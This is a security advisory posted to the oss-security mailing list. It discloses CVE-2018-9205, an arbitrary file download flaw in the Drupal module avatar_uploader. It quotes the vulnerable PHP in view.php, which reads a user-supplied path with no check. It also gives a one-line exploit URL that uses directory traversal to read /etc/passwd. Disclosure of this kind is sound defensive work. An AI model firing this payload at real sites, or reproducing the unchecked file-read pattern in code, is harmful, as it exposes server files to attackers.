Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list] 
Message-id: <3B4F690F-2918-4282-BEBE-E163F07D205F@me.com>
Date: Thu, 12 Apr 2018 08:28:15 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Arbitrary file download vulnerability in Drupal module avatar_uploader
 v7.x-1.0-beta8

Title: Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8
Author: Larry W. Cashdollar
Date: 2018-03-30
CVE-ID:[CVE-2018-9205]
Download Site: https://www.drupal.org/project/avatar_uploader
Vendor: https://www.drupal.org/u/robbinzhao
Vendor Notified: 2018-04-02
Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
Advisory: http://www.vapidlabs.com/advisory.php?v=202
Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
Vulnerability:
The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory:

<?php

$file = $_GET['file'];

echo file_get_contents("uploadDir/$file");
exit;

Exploit Code:
	• http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.